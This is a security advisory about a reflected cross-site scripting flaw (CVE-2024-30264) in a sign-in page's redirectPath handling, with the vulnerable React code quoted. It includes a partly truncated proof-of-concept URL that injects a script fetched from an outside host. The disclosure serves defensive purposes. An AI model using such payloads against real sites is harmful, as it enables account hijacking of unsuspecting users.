skip to content
Back to
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
May 23, 2024

GHSL-2024-040: Cross-Site Scripting (XSS) in the sign-in page of - CVE-2024-30264

Kevin Stubbings

Coordinated Disclosure Timeline


A reflected cross-site scripting (XSS) in the sign-in page of may allow an attacker to hijack a user’s account.


Tested Version



Reflected XSS in SignInForm.tsx (GHSL-2024-040)

The sign-in page takes the redirectPath parameter from the URL. If a user clicks on a link where the redirectPath parameter has a javascript scheme, the attacker that crafted the link may be able to execute arbitrary JavaScript with the privileges of the user.

export const SignInForm = ({
}: Props & HTMLChakraProps<'form'>) => {
  const { t } = useTranslate()
  const router = useRouter()
  const { status } = useSession()
  const [authLoading, setAuthLoading] = useState(false)
  const [isLoadingProviders, setIsLoadingProviders] = useState(true)

  const [emailValue, setEmailValue] = useState(defaultEmail ?? '')
  const [isMagicLinkSent, setIsMagicLinkSent] = useState(false)

  const { showToast } = useToast()
  const [providers, setProviders] =
      Record<LiteralUnion<BuiltInProviderType, string>, ClientSafeProvider>

  const hasNoAuthProvider =
    !isLoadingProviders && Object.keys(providers ?? {}).length === 0

  useEffect(() => {
    if (status === 'authenticated') {
      router.replace(router.query.redirectPath?.toString() ?? '/typebots')        <------ url redirected to query parameter

This vulnerability was found with the help of CodeQL’s Reflected XSS Query


This issue may lead to Account Takeover.

Proof of Concept

The following link will grab a javascript file from localhost and execute it in the context of the current domain. An attacker can use this payload to grab javascript from his host and execute in the domain of the victim.;script.src%20=%20%27http://;%20document.head.appendChild(script);#//




This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).


You can contact the GHSL team at, please include a reference to GHSL-2024-040 in any communication regarding this issue.